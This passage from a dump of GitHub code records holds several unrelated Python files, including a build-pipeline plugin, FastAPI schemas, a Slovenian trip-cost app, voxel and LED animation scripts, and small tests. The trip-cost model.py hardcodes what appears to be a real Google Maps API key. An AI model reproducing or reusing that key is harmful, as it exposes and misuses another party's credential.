'ProcesserBuildGetSysInfos'\n\n @classmethod\n def execute(cls, input_data, context: dict, pipeline_obj, run_id: str):\n \"\"\"\n 执行处理\n\n @param {object} input_data - 处理器输入数据值,除第一个处理器外,该信息为上一个处理器的输出值\n @param {dict} context - 传递上下文,该字典信息将在整个管道处理过程中一直向下传递,可以在处理器中改变该上下文信息\n @param {Pipeline} pipeline_obj - 管道对象\n\n @returns {object} - 处理结果输出数据值, 供下一个处理器处理, 异步执行的情况返回None\n \"\"\"\n # 获取当前要处理的标识\n _current_key = context.get('current_key', 'getSysInfos')\n _context_set_key = context.get('sys_infos_set_key', 'sysInfos') # 要设置到上下文的系统信息key\n _config = context['build_config'].get(_current_key, None)\n\n # 获取不到配置, 不处理\n if _config is None:\n return input_data\n\n # 获取扩展参数配置\n _extend_para = BuildPipeline.get_processer_extend_para(cls.processer_name(), 
default={})\n\n # 初始化插件管理模块\n _lib_manager = DynamicLibManager(os.getcwd())\n\n # 遍历参数查询可支持的系统信息\n _infos = {}\n for _get_id, _get_para in _config.items():\n if _get_para is None:\n _get_para = {}\n\n # 获取信息查询函数\n _info_type = _get_para.get('infoType', _get_id)\n _info_para = _extend_para.get(_info_type, None)\n if _info_para is None:\n raise ModuleNotFoundError('Info type [%s] not found in extend para!' % _info_type)\n\n _func = _info_para.get('func', None)\n if _func is None:\n _func = _lib_manager.load_by_config(_info_para['libConfig'])\n if not callable(_func):\n raise AttributeError('Info type [%s] is not callable!' % _info_type)\n\n _info_para['func'] = _func\n\n # 执行函数\n _get_key = _get_para.get('getKey', _info_para.get('getKey', _info_type))\n _infos[_get_key] = _func(\n *_get_para.get('args', []), **_get_para.get('kwargs', {})\n )\n\n # 将获取到的参数放入上下文\n context[_context_set_key] = _infos\n\n # 返回输出结果\n return input_data\n","repo_name":"snakeclub/HiveNetAssemble","sub_path":"HiveNetBuildTool/HiveNetBuildTool/plugins/processer_get_sys_infos.py","file_name":"processer_get_sys_infos.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74700604068","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom pydantic import BaseModel, Field\n\nfrom app.models.course_timeslot import TimeSlotKind, WeekDay\n\n\n# Shared properties\nclass CourseTimeslotBase(BaseModel):\n code: str = Field(example=\"A\")\n timespan: str = Field(example=\"7:00-7:50\")\n weekday: WeekDay = Field(example=WeekDay.Fri)\n kind: TimeSlotKind = Field(example=TimeSlotKind.nctu)\n location: str = Field(example=\"EC022\")\n\n\nclass CourseTimeslotCreate(CourseTimeslotBase):\n \"\"\"Class for validating create CourseTimeslot request\"\"\"\n\n\nclass CourseTimeslotUpdate(CourseTimeslotBase):\n \"\"\"Class for validating update CourseTimeslot request\"\"\"\n\n code: Optional[str] = Field(None, example=\"B\")\n timespan: Optional[int] = Field(None, example=\"8:00-8:50\")\n weekday: Optional[WeekDay] = Field(None, example=WeekDay.Tue)\n kind: Optional[TimeSlotKind] = Field(None, example=TimeSlotKind.nctu)\n location: str = Field(None, example=\"EC022\")\n\n\n# Propeties to return to client\nclass CourseTimeslot(CourseTimeslotBase):\n class Config:\n orm_mode = True\n\n @classmethod\n def get_example(cls):\n # There's a bug in FastAPI for rendering nested example by default Field() method,\n # so we defined our exmaple method and get it outside\n return CourseTimeslot(\n code=\"C\",\n timespan=\"10:00-10:50\",\n weekday=WeekDay.Wed,\n kind=TimeSlotKind.nctu,\n location=\"ED202\",\n )\n\n\n# Properties shared by models stored in DB\nclass CourseTimeslotInDBBase(CourseTimeslotBase):\n id: int = Field(example=1)\n course_id: int = Field(example=34)\n\n create_at: datetime\n update_at: datetime\n\n class Config:\n orm_mode = True\n\n\n# Properties stored in DB\nclass CourseTimeslotInDB(CourseTimeslotInDBBase):\n pass\n","repo_name":"ianchen-tw/plus","sub_path":"plus/app/schemas/course_timeslot.py","file_name":"course_timeslot.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"73154402151","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 4 19:50:17 2020\r\n\r\n@author: Lenovo\r\n\"\"\"\r\n\r\n\r\n#https://codeforces.com/contest/1316/problem/A\r\n\r\ndef add_total(array):\r\n output = 0\r\n for i in 
range(len(array)):\r\n output += int(array[i])\r\n return output\r\n\r\ndef maximize_grade():\r\n cases = int(input())\r\n students = [] #[0] = students, [1] = max grade\r\n grades = []\r\n for i in range(cases):\r\n students.append(input().split())\r\n grades.append(input().split())\r\n \r\n for i in range(len(students)):\r\n if int(students[i][1]) == int(grades[i][0]):\r\n print(int(grades[i][0]))\r\n else:\r\n total = add_total(grades[i])\r\n if total >= int(students[i][1]):\r\n print(int(students[i][1]))\r\n else:\r\n print(total)\r\n\r\n \r\nmaximize_grade()\r\n ","repo_name":"xlax007/Collection-of-Algorithms","sub_path":"Maximize_grade.py","file_name":"Maximize_grade.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74551973350","text":"import sys\nsys.path.insert(0, '../code')\n\nimport unittest\nfrom q6 import mostFrequent\n\nclass MostFrequentNumTestCase(unittest.TestCase):\n\n def test_most_frequent(self):\n self.assertEqual(mostFrequent([1, 2, 3, 3, 3, 4, 2, 5, 1]), 3) \n self.assertEqual(mostFrequent([1, 1, 1, 1, 1, 1]), 1)\n self.assertTrue(mostFrequent([2, 2, 2, 3, 3, 3]) == 2 or mostFrequent([2, 2, 2, 3, 3, 3]) == 3) \n \nif __name__ == \"__main__\":\n unittest.main()","repo_name":"srividya-p/Forcepoint-Training","sub_path":"warmup/test/q6test.py","file_name":"q6test.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21877874029","text":"from re import I\nimport googlemaps\nimport json\nimport requests\nimport math\nfrom datetime import date\nimport hashlib\nimport random\n\nCO2_NA_KM_AVTO = 180 #g/km\nCO2_NA_KM_BUS = 90 #g/km\nCO2_NA_KM_VLAK = 45 #g/km\nCENA_IZPUSTOV_VISOKA = 500 #€/t CO2\nCENA_IZPUSTOV_SREDNJA = 270 #€/t CO2\nCENA_IZPUSTOV_NIZKA = 156 #€/t CO2\nCENA_CASA_VISOKA = 0.18 #€/min\nCENA_CASA_SREDNJA = 0.09 #€/min\nCENA_CASA_NIZKA = 0.06 #€/min\nSTROSEK_AVTOMOBILA_NA_KM = 0.15 #€/km\nCENA_VLAK_NA_KM = 0.1 #€/km\n\nAPI_KEY = 'AIzaSyCtY_U7vcBuZna2_j4TiCxl9tUuSKL_8mM'\nSREDSTVA = [\"walking\", \"bicycling\", \"driving\", \"train\", \"bus\"]\n\nmap_client = googlemaps.Client(API_KEY)\n\nzacetni_url = \"https://maps.googleapis.com/maps/api/distancematrix/json?units=metric\"\n\nclass Uporabnik:\n def __init__(self, uporabnisko_ime, zasifrirano_geslo, stanje, pomembnost_casa=None, pomembnost_onesnazevanja=None):\n self.uporabnisko_ime = uporabnisko_ime\n self.zasifrirano_geslo = zasifrirano_geslo\n self.stanje = stanje\n self.pomembnost_casa = pomembnost_casa\n self.pomembnost_onesnazevanja = pomembnost_onesnazevanja\n \n @staticmethod\n def ime_uporabnikove_datoteke(uporabnisko_ime):\n return f\"{uporabnisko_ime}.json\"\n\n\n @staticmethod\n def prijava(uporabnisko_ime, geslo_v_cistopisu):\n uporabnik = Uporabnik.iz_datoteke(uporabnisko_ime)\n if uporabnik is None:\n raise ValueError(\"Uporabniško ime ne obstaja!\")\n elif uporabnik.preveri_geslo(geslo_v_cistopisu):\n return uporabnik \n else:\n raise ValueError(\"Geslo je napačno\")\n\n @staticmethod\n def registracija(uporabnisko_ime, geslo_v_cistopisu):\n if Uporabnik.iz_datoteke(uporabnisko_ime) is not None:\n raise ValueError(\"Uporabniško ime že obstaja\")\n else:\n zasifrirano_geslo = Uporabnik._zasifriraj_geslo(geslo_v_cistopisu)\n uporabnik = Uporabnik(uporabnisko_ime, zasifrirano_geslo, Stanje())\n uporabnik.v_datoteko()\n return uporabnik\n\n @staticmethod\n def _zasifriraj_geslo(geslo_v_cistopisu, 
sol=None):\n if sol is None:\n sol = str(random.getrandbits(32))\n posoljeno_geslo = sol + geslo_v_cistopisu\n h = hashlib.blake2b()\n h.update(posoljeno_geslo.encode(encoding=\"utf-8\"))\n return f\"{sol}${h.hexdigest()}\"\n\n def preveri_geslo(self, geslo_v_cistopisu):\n sol, _ = self.zasifrirano_geslo.split(\"$\")\n return self.zasifrirano_geslo == Uporabnik._zasifriraj_geslo(geslo_v_cistopisu, sol)\n\n\n def v_slovar(self):\n return {\n \"uporabnisko_ime\": self.uporabnisko_ime,\n \"zasifrirano_geslo\": self.zasifrirano_geslo,\n \"stanje\": self.stanje.v_slovar(),\n \"pomembnost_casa\": self.pomembnost_casa,\n \"pomembnost_onesnazevanja\": self.pomembnost_onesnazevanja\n }\n\n @staticmethod\n def iz_slovarja(slovar):\n uporabnisko_ime = slovar[\"uporabnisko_ime\"]\n zasifrirano_geslo = slovar[\"zasifrirano_geslo\"]\n pomembnost_casa = slovar[\"pomembnost_casa\"]\n pomembnost_onesnazevanja = slovar[\"pomembnost_onesnazevanja\"]\n stanje = Stanje.iz_slovarja(slovar[\"stanje\"])\n return Uporabnik(uporabnisko_ime, zasifrirano_geslo, stanje, pomembnost_casa, pomembnost_onesnazevanja)\n\n\n def v_datoteko(self):\n with open(\n Uporabnik.ime_uporabnikove_datoteke(self.uporabnisko_ime), \"w\") as datoteka:\n json.dump(self.v_slovar(), datoteka, ensure_ascii=False, indent=4)\n\n @staticmethod\n def iz_datoteke(uporabnisko_ime):\n try:\n with open(Uporabnik.ime_uporabnikove_datoteke(uporabnisko_ime)) as datoteka:\n slovar = json.load(datoteka)\n return Uporabnik.iz_slovarja(slovar)\n except FileNotFoundError:\n return None\n\n\n def nastavi_pomembnost_casa(self, vrednost):\n if vrednost == 'zelo':\n self.pomembnost_casa = True\n elif vrednost == 'malo':\n self.pomembnost_casa = False\n else:\n self.pomembnost_casa = None\n\n def nastavi_pomembnost_onesnazevanja(self, vrednost):\n if vrednost == 'zelo':\n self.pomembnost_onesnazevanja = True\n elif vrednost == 'malo':\n self.pomembnost_onesnazevanja = False\n else:\n self.pomembnost_onesnazevanja = None\n\n\n\n\n\nclass Pot:\n def __init__(self, zacetek, konec, sredstvo, datum, razdalja=None, trajanje=None, cena=None, izpusti=None, optimalna=None, pomembnost_casa=None, pomembnost_onesnazevanja=None, rec=True):\n self.zacetek = zacetek\n self.konec = konec\n self.sredstvo = sredstvo\n self.datum = datum\n \n if razdalja:\n self.razdalja = razdalja\n elif self.izracunana_razdalja_in_trajanje():\n self.razdalja = self.izracunana_razdalja_in_trajanje()[0]\n else:\n raise ValueError('Ne najdem poti!')\n \n if trajanje:\n self.trajanje = trajanje\n else:\n self.trajanje = self.izracunana_razdalja_in_trajanje()[1]\n \n if cena:\n self.cena = cena\n else:\n self.cena = self.izracunana_cena()\n \n if izpusti:\n self.izpusti = izpusti\n else:\n self.izpusti = self.izracunani_izpusti()\n \n if optimalna != None:\n self.optimalna = optimalna\n elif rec:\n self.optimalna = self.optimalna_pot(pomembnost_casa, pomembnost_onesnazevanja)\n\n\n def __str__(self):\n return f'Pot({self.zacetek}, {self.konec}, {self.sredstvo}, {self.datum})'\n\n\n # prevede ime sredstva v slovenščino\n def sredstvo_slo(self):\n return prevedi(self.sredstvo)\n\n \n #sestavi url za klic distance matrice preko API\n def url(self):\n if self.sredstvo == 'train' or self.sredstvo == 'bus':\n u = zacetni_url + \"&origins=\" + self.zacetek + \"&destinations=\" + self.konec + \"&mode=transit&transit_mode=\" + self.sredstvo + \"&key=\" + API_KEY\n return u\n elif self.sredstvo == 'walking' or self.sredstvo == 'bicycling':\n u = zacetni_url + \"&origins=\" + self.zacetek + \"&destinations=\" + 
self.konec + \"&mode=walking&key=\" + API_KEY\n return u\n elif self.sredstvo == 'driving':\n u = zacetni_url + \"&origins=\" + self.zacetek + \"&destinations=\" + self.konec + \"&mode=\" + self.sredstvo + \"&key=\" + API_KEY\n return u\n else:\n raise ValueError(\"Prevozno sredstvo ne obstaja!\")\n\n #izračuna prepotovano razdaljo med začetnim in končnim krajem z danim prevoznim sredstvom\n def izracunana_razdalja_in_trajanje(self):\n try:\n output = requests.get(self.url()).json()\n razdalja = output[\"rows\"][0][\"elements\"][0][\"distance\"][\"value\"]\n kon = output['destination_addresses']\n zac = output['origin_addresses']\n if self.sredstvo == 'bicycling':\n trajanje = (output[\"rows\"][0][\"elements\"][0][\"duration\"][\"value\"]) / 3 #povprečna hitrost mestne vožnje s kolesom je 15km/h hoje pa 5km/h\n else:\n trajanje = output[\"rows\"][0][\"elements\"][0][\"duration\"][\"value\"]\n \n return (razdalja, trajanje)\n except KeyError or IndexError:\n raise ValueError(\"Ta pot ne obstaja! Preveri vnešene podatke.\")\n\n\n #izračuna dejansko ceno poti(gorivo, stroški uporabe avtomobila, približna ocena cene vozovnic na kilometer prepotovane poti z vlakom/busom)\n #loči vlak in bus?\n def izracunana_cena(self):\n if self.sredstvo == 'driving':\n c = STROSEK_AVTOMOBILA_NA_KM * self.izracunana_razdalja_in_trajanje()[0] / 1000\n elif self.sredstvo == 'train' or self.sredstvo == 'bus':\n c = CENA_VLAK_NA_KM * self.izracunana_razdalja_in_trajanje()[0] / 1000\n else:\n c = 0\n \n return c\n\n #izračuna količino izpustov CO2, proizvedenih s potjo v gramih\n def izracunani_izpusti(self):\n if self.sredstvo == \"driving\":\n return self.izracunana_razdalja_in_trajanje()[0] * CO2_NA_KM_AVTO * 10 **(-3)\n elif self.sredstvo == \"train\":\n return self.izracunana_razdalja_in_trajanje()[0] * CO2_NA_KM_VLAK * 10 **(-3)\n elif self.sredstvo == \"bus\":\n return self.izracunana_razdalja_in_trajanje()[0] * CO2_NA_KM_BUS * 10 **(-3)\n else:\n return 0\n\n\n #določi optimalno prevozno sredstvo za dano začetno in končno točko\n #povezi z razredom uporabnik\n def optimalna_pot(self, preferenca_cas=None, preferenca_onesnazevanje=None):\n min = math.inf\n optimalna = ''\n \n for sredstvo in SREDSTVA:\n \n pot = Pot(self.zacetek, self.konec, sredstvo, self.datum, rec=False)\n if not pot:\n continue\n else:\n i = indeks(pot.trajanje, pot.izpusti, pot.cena, preferenca_cas, preferenca_onesnazevanje)\n if i < min:\n optimalna = pot\n min = i\n return {'zacetek': optimalna.zacetek, 'konec': optimalna.konec, 'sredstvo': optimalna.sredstvo, 'datum': optimalna.datum, 'razdalja': optimalna.razdalja, 'trajanje': optimalna.trajanje, 'cena': optimalna.cena, 'izpusti': optimalna.izpusti}\n\n\n#izračuna vrednost časa, ki ga porabiš za pot\ndef cena_casa(trajanje, preferenca_cas):\n if preferenca_cas:\n cena = CENA_CASA_VISOKA / 60 * trajanje\n elif preferenca_cas == None:\n cena = CENA_CASA_SREDNJA / 60 * trajanje\n else:\n cena = CENA_CASA_NIZKA / 60 * trajanje\n return cena\n\n#izračuna vrednost izpustov CO2, ki jih proizvedeš s potjo\ndef cena_izpustov(izpusti, preferenca_onesnazevanje):\n if preferenca_onesnazevanje:\n cena = CENA_IZPUSTOV_VISOKA * izpusti * 10 **(-6)\n elif preferenca_onesnazevanje == None:\n cena = CENA_IZPUSTOV_SREDNJA * izpusti * 10 **(-6)\n else:\n cena = CENA_IZPUSTOV_NIZKA * izpusti * 10 **(-6)\n return cena\n\n#izračuna celotno ceno poti skupaj z navideznimi stroški časa in izpustov CO2\ndef indeks(trajanje, izpusti, cena, preferenca_cas=None, preferenca_onesnazevanje=None):\n return cena + 
cena_casa(trajanje, preferenca_cas) + cena_izpustov(izpusti, preferenca_onesnazevanje)\n\ndef prevedi(ime):\n if ime == 'driving':\n return 'Avto'\n elif ime == 'walking':\n return 'Hoja'\n elif ime == 'bicycling':\n return 'Kolo'\n elif ime == 'train':\n return 'Vlak'\n elif ime == 'bus':\n return 'Bus'\n else:\n return None\n\nclass Prevozno_sredstvo:\n def __init__(self, ime, cena=0):\n self.ime = ime\n self.poti = []\n self.optimalne = []\n self.cena = cena\n\n def ime_slo(self):\n return prevedi(self.ime)\n\n # skupna dolžina vseh poti tega sredstva\n def skupna_dolzina(self):\n d = 0\n for pot in self.poti:\n d += pot.razdalja\n return d\n \n # skupno trajanje vseh poti tega sredstva\n def skupno_trajanje(self):\n t = 0\n for pot in self.poti:\n t += pot.trajanje\n return t\n \n #skupna cena vseh poti tega sredstva\n def skupna_cena(self):\n c = 0\n for pot in self.poti:\n c += pot.cena\n return c\n\n # skupna cena poti sredstva in dodatnih stroškov pri sredstvu\n def skupna_cena_sredstva(self):\n cena_sredstva = self.cena\n cena_poti = self.skupna_cena()\n skupaj = cena_sredstva + cena_poti\n return skupaj\n\n # skupni izpusti vseh poti tega sredstva v gramih\n def izpusti_co2(self):\n izpusti = 0\n for pot in self.poti:\n izpusti += pot.izpusti\n return izpusti\n\n # doda strošek, porabljen za sredstvo\n def dodaj_strosek(self, strosek):\n if ',' in strosek:\n raise ValueError('Prosimo, uporabite piko!')\n elif strosek.isnumeric() or (\".\" in strosek) or (\"-\" in strosek and strosek[1:].isnumeric()):\n if self.cena + float(strosek) < 0:\n raise ValueError(\"Stroški ne morejo biti negativni!\")\n self.cena += float(strosek)\n\n return self.cena\n else:\n raise ValueError('Prosim vnesite število!')\n\n #doda pot na seznam poti tega sredstva\n def dodaj_pot(self, pot):\n self.poti.append(pot)\n self.optimalne.append(pot.optimalna)\n \n # odstrani pot s seznama poti sredstva\n def odstrani_pot(self, pot):\n self.poti.remove(pot)\n self.optimalne.remove(pot.optimalna)\n\n\n\nclass Stanje:\n def __init__(self):\n self.prevozna_sredstva = []\n self.poti = []\n self.optimalne = []\n self.prevozna_sredstva_po_imenih = {}\n self.poti_po_sredstvih = {None: []}\n self.optimalne_po_sredstvih = {None: []}\n\n # ustvari objekt razreda sredstvo in ga doda v objekt razreda stanje\n def dodaj_sredstvo(self, ime, cena=0):\n if ime in self.prevozna_sredstva_po_imenih:\n raise ValueError(f'Prevozno sredstvo {ime} že obstaja!')\n nov = Prevozno_sredstvo(ime, cena)\n self.prevozna_sredstva.append(nov)\n self.prevozna_sredstva_po_imenih[ime] = nov\n self.poti_po_sredstvih[nov] = []\n self.optimalne_po_sredstvih[nov] = []\n return nov\n\n # odstrani sredstvo z danim imenom in njegove poti pripiše h ključu None v slovarju poti\n def odstrani_sredstvo(self, ime):\n if ime in self.prevozna_sredstva_po_imenih:\n sredstvo = self.prevozna_sredstva_po_imenih[ime]\n for pot in sredstvo.poti:\n self.poti_po_sredstvih[None].append(pot)\n for optimalna in sredstvo.optimalne:\n self.optimalne_po_sredstvih[None].append(optimalna)\n self.prevozna_sredstva.remove(sredstvo)\n del self.poti_po_sredstvih[sredstvo]\n del self.optimalne_po_sredstvih[sredstvo]\n del self.prevozna_sredstva_po_imenih[ime]\n else:\n return None\n\n # doda pot v stanje in k ustreznemu sredstvu\n # treba je vključiti še preference\n def dodaj_pot(self, zacetek, konec, sredstvo, datum, razdalja=None, trajanje=None, cena=None, izpusti=None, optimalna=None, pomembnost_casa=None, pomembnost_onesnazevanja=None, rec=True):\n if sredstvo in 
self.prevozna_sredstva_po_imenih:\n nova = Pot(zacetek, konec, sredstvo, datum, razdalja, trajanje, cena, izpusti, optimalna, pomembnost_casa, pomembnost_onesnazevanja, rec)\n sredstvo = self.poisci_sredstvo(sredstvo)\n self.poti.append(nova)\n self.optimalne.append(nova.optimalna)\n self.poti_po_sredstvih[sredstvo].append(nova)\n self.optimalne_po_sredstvih[sredstvo].append(nova.optimalna)\n sredstvo.dodaj_pot(nova)\n return nova\n elif razdalja == None:\n raise ValueError(f'Izbranega prevoznega sredstva nimate med svojimi sredstvi!')\n else:\n nova = Pot(zacetek, konec, sredstvo, datum, razdalja, trajanje, cena, izpusti, optimalna, pomembnost_casa, pomembnost_onesnazevanja, rec=False)\n self.poti.append(nova)\n self.optimalne.append(nova.optimalna)\n self.poti_po_sredstvih[None].append(nova)\n self.optimalne_po_sredstvih[None].append(nova.optimalna)\n return nova\n\n\n # odstrani pot iz vseh seznamov in slovarjev\n def odstrani_pot(self, pot):\n if pot in self.poti:\n if pot.sredstvo in self.prevozna_sredstva_po_imenih:\n sredstvo = self.poisci_sredstvo(pot.sredstvo)\n self.poti_po_sredstvih[sredstvo].remove(pot)\n self.optimalne_po_sredstvih[sredstvo].remove(pot.optimalna) \n self.poti.remove(pot)\n self.optimalne.remove(pot.optimalna) \n sredstvo.odstrani_pot(pot)\n else:\n self.poti_po_sredstvih[None].remove(pot)\n self.optimalne_po_sredstvih[None].remove(pot.optimalna) \n self.poti.remove(pot)\n self.optimalne.remove(pot.optimalna) \n else:\n return None\n\n # poišče objekt razreda sredstvo z danim imenom\n def poisci_sredstvo(self, ime):\n if ime in self.prevozna_sredstva_po_imenih:\n return self.prevozna_sredstva_po_imenih[ime]\n else:\n raise KeyError(f'Izbranega prevoznega sredstva nimaš med svojimi sredstvi!')\n\n # poišče objekt razreda pot z danimi podatki\n def poisci_pot(self, zacetek, konec, sredstvo, datum):\n for pot in self.poti:\n if pot.zacetek == zacetek and pot.konec == konec and pot.sredstvo == sredstvo and pot.datum == datum:\n return pot\n raise ValueError('Ta pot ne obstaja!')\n\n # izračuna skupno razdaljo vseh poti vseh sredstev\n def skupna_razdalja(self):\n d = 0\n for sredstvo in self.prevozna_sredstva:\n d += sredstvo.skupna_dolzina()\n return d\n\n # izračuna skupno trajanje poti vseh sredstev\n def skupno_trajanje(self):\n t = 0\n for sredstvo in self.prevozna_sredstva:\n t += sredstvo.skupno_trajanje()\n return t \n\n # izračuna skupno ceno vseh sredstev(vključno s stroški sredstev)\n def skupna_cena(self):\n c = 0\n for sredstvo in self.prevozna_sredstva:\n c += sredstvo.skupna_cena_sredstva()\n return c\n\n # izračuna skupno količino izpustov vseh poti vseh sredstev\n def skupni_izpusti(self):\n c = 0\n for sredstvo in self.prevozna_sredstva:\n c += sredstvo.izpusti_co2()\n return c\n\n # izračuna dolžino vseh poti, če bi vsakič izbral optimalno sredstvo\n def skupna_dolzina_optimalno(self):\n d = 0\n for pot in self.optimalne:\n d += pot[\"razdalja\"]\n return d\n\n # izračuna koliko bi trajale poti, če bi vsakič izbral optimalno sredstvo\n def skupno_trajanje_optimalno(self):\n t = 0\n for pot in self.optimalne:\n t += pot[\"trajanje\"]\n return t\n\n # izračuna koliko bi bilo stroškov, če bi vsakič izbral optimalno sredstvo\n def skupna_cena_optimalno(self):\n c = 0\n for pot in self.optimalne:\n c += pot[\"cena\"]\n return c\n\n # izračuna koliko bi bilo izpustov, če bi vsakič izbral optimalno sredstvo\n def izpusti_co2_optimalno(self):\n izpusti = 0\n for pot in self.optimalne:\n izpusti += pot[\"izpusti\"]\n return izpusti\n\n #podatke o objektu 
razreda stanje zapiše v slovar\n def v_slovar(self):\n return {\n \"prevozna sredstva\": [\n {\n \"ime\": sredstvo.ime,\n \"cena\": sredstvo.cena\n }\n for sredstvo in self.prevozna_sredstva\n ],\n \"poti\": [\n {\n \"zacetek\": pot.zacetek,\n \"konec\": pot.konec,\n \"sredstvo\": pot.sredstvo,\n \"datum\": str(pot.datum),\n \"razdalja\": pot.razdalja,\n \"trajanje\": pot.trajanje,\n \"cena\": pot.cena,\n \"izpusti\": pot.izpusti,\n \"optimalna\": pot.optimalna\n }\n for pot in self.poti\n ],\n }\n \n #iz slovarja prebere podatke in ustvari objekt razreda stanje\n @staticmethod\n def iz_slovarja(slovar):\n stanje = Stanje()\n for sredstvo in slovar[\"prevozna sredstva\"]:\n stanje.dodaj_sredstvo(sredstvo[\"ime\"], sredstvo[\"cena\"])\n\n for pot in slovar[\"poti\"]:\n stanje.dodaj_pot(\n pot[\"zacetek\"],\n pot[\"konec\"],\n pot[\"sredstvo\"],\n pot[\"datum\"],\n pot[\"razdalja\"],\n pot[\"trajanje\"],\n pot[\"cena\"],\n pot[\"izpusti\"],\n pot[\"optimalna\"],\n rec=False\n )\n return stanje\n \n # shrani uporabnikovo stanje v datoteko\n def shrani_stanje(self, ime_datoteke):\n with open(ime_datoteke, 'w') as dat:\n slovar = self.v_slovar()\n json.dump(slovar, dat)\n \n #prebere stanje iz datoteke z uporabnikovim stanjem\n @staticmethod\n def nalozi_stanje(ime_datoteke):\n with open(ime_datoteke) as dat:\n slovar = json.load(dat)\n return Stanje.iz_slovarja(slovar)","repo_name":"masazaucer/aplikacija-prevoz","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20729,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27423266170","text":"from scene import Scene\nimport taichi as ti\nfrom taichi.math import *\n\ncolor = (0.6, 0.2, 0.2)\n\nscene = Scene(voxel_edges=0, exposure=10)\nscene.set_floor(-0.05, (1.0, 1.0, 1.0))\nscene.set_directional_light((-1, 1, -1), 0.1, (0.5, 0.5, 0.5))\n\n\n@ti.func\ndef makeup(end, num):\n for m in range(1, end):\n for j in range(-3, 4):\n scene.set_voxel(vec3(41+m, num, j), 1, vec3(0.6, 0.2, 0.2))\n\n@ti.kernel\ndef initialize_voxels():\n for x in ti.ndrange((0, 42)):\n if x % 14 == 0 or x == 4:\n continue\n for i in range(-3, 4):\n for j in range(-3, 4):\n scene.set_voxel(vec3(x, 56+i, j), 1, vec3(0.6, 0.2, 0.2))\n makeup(7, 59); makeup(6, 58); makeup(5, 57); makeup(4, 56); makeup(3, 55); makeup(2, 54)\n for y in ti.ndrange((0, 60)):\n if y % 15 == 0 and y < 50:\n continue\n for i in range(-3, 4):\n for j in range(-3, 4):\n scene.set_voxel(vec3(i, y, j), 1, vec3(0.6, 0.2, 0.2))\n for z in ti.ndrange((-49, 4)):\n if z == -34 or z == -19:\n continue\n for i in range(-3, 4):\n for j in range(-3, 4):\n scene.set_voxel(vec3(i, j, z), 1, vec3(0.6, 0.2, 0.2))\n\ninitialize_voxels()\nscene.finish()","repo_name":"mrzhuzhe/sunx","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"41608141891","text":"SOURCE_BUCKET = \"source-test\"\nDESTINATION_BUCKET = \"dest-test\"\nKEY = \"test/test.py\"\n\n# mock s3 client\n@pytest.fixture\ndef s3():\n \"\"\"Pytest fixture that creates two buckets and key\n Yields a fake boto3 s3 client\n \"\"\"\n with mock_s3():\n s3 = boto3.client(\"s3\")\n s3.create_bucket(Bucket=DESTINATION_BUCKET)\n s3.create_bucket(Bucket=SOURCE_BUCKET)\n s3.put_object(Bucket=SOURCE_BUCKET, Key=KEY)\n yield s3\n \ndef test_copy_object(s3):\n\n assert function.copy_object(\n s3, dest_bucket) == 
SUCCESS_MESSAGE\n","repo_name":"hunterpack/code-snippets","sub_path":"python/tests/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28627783431","text":"import random\nimport colorsys\n\n\n# Drops are more dense and on average brighter near the wave centre\ndensity_away_from_wave = 1 / 15 # Matches baseline rainfall\ndensity_near_wave = 4 / 15\ndensity_at_wave = 4 / 15\n\n# Each of these is a range corresponding to arguments to random.randint\nintensity_away_from_wave = (25, 75) # Matches baseline rainfall\nintensity_near_wave = (50, 150)\nintensity_at_wave = (50, 150)\n\n# What change in hue does a rainbow wave experience from one end to the other\nrainbow_hue_range = 0.3\n\n\ndef clip3(val, min=0.0, max=1.0):\n \"\"\" Clip a value to within a min and max range \"\"\"\n if val < min:\n return min\n elif val > max:\n return max\n else:\n return val\n\n\nclass RainWaves:\n \"\"\" Generic class covering both rainbow and fixed colour waves \"\"\"\n\n def __init__(self, rainbow):\n self.rainbow = rainbow\n if rainbow:\n # For rainbow waves the hue will vary as it moves. The hue we\n # store here is what is seen at the left edge. To ensure the\n # rainbow doesn't go out of range we cap the starting hue.\n self.wave_hue = random.random() * (1 - rainbow_hue_range)\n else:\n self.wave_hue = random.random()\n\n if random.randint(0, 1) == 0:\n # Wave from left to right\n self.wave_pos = -5.0\n self.wave_velocity = 0.1\n else:\n # Wave from right to left\n self.wave_pos = 20.0\n self.wave_velocity = -0.1\n\n def generate(self, led_state, transition, tick):\n # Move the wave along\n self.wave_pos += self.wave_velocity\n\n # Move all the LED positions down by one, shifting in black\n for strip in led_state:\n strip[:] = [(0, 0, 0)] + strip[:-1]\n\n # Generate a \"drip\" on some random strips. 
Drips are more dense and\n # brighter around the wave position\n for strip_num, strip in enumerate(led_state):\n if abs(strip_num - self.wave_pos) < 1.0:\n density = density_at_wave\n intensity = intensity_at_wave\n elif abs(strip_num - self.wave_pos) < 3.0:\n density = density_near_wave\n intensity = intensity_near_wave\n else:\n density = density_away_from_wave\n intensity = intensity_away_from_wave\n\n if random.random() < density:\n # Generate a drop\n drop_intensity = random.randint(*intensity) / 255\n\n if abs(strip_num - self.wave_pos) < 5.0:\n drop_saturation = 1 - abs(strip_num - self.wave_pos) / 5.0\n drop_saturation = drop_saturation ** 0.5\n else:\n drop_saturation = 0.0\n\n if self.rainbow:\n hue = self.wave_hue + \\\n clip3(self.wave_pos / 15.0) * rainbow_hue_range\n else:\n hue = self.wave_hue\n\n drop_hsv = (hue, drop_saturation, drop_intensity)\n rgb = colorsys.hsv_to_rgb(*drop_hsv)\n drop_colour = tuple(255 * x for x in rgb)\n strip[0] = 